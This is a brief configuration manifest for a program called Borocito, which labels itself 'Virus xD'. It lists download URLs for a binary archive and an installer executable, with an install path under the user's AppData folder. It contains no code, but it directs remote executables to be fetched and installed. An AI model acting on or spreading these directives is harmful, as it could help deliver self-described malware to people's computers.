#Worcome Studios Service File
[Assembly]
Status=True
Name=Borocito
Version=0.2.0.0
Description=Virus xD
[Runtime]
VisitURL=None
Message=None
ArgumentLine=None
Command=None
[Updates]
Critical=False
Message=None
CanUseOldVersion=False
[Installer]
Status=True
BinDownload=https://chemic-jug.000webhostapp.com/WSS_Structure/Borocito.zip
InsDownload=https://www.dropbox.com/s/rged2wwcnuimb38/Apps%20Installer.exe?dl=1
CanDowngrade=False
NeedStartUp=False
NeedRestart=False
NeedElevateAccess=False
InstallFolder=C:\Users\%username%\AppData\Local\Zhenboro\Borocito
BitArch=32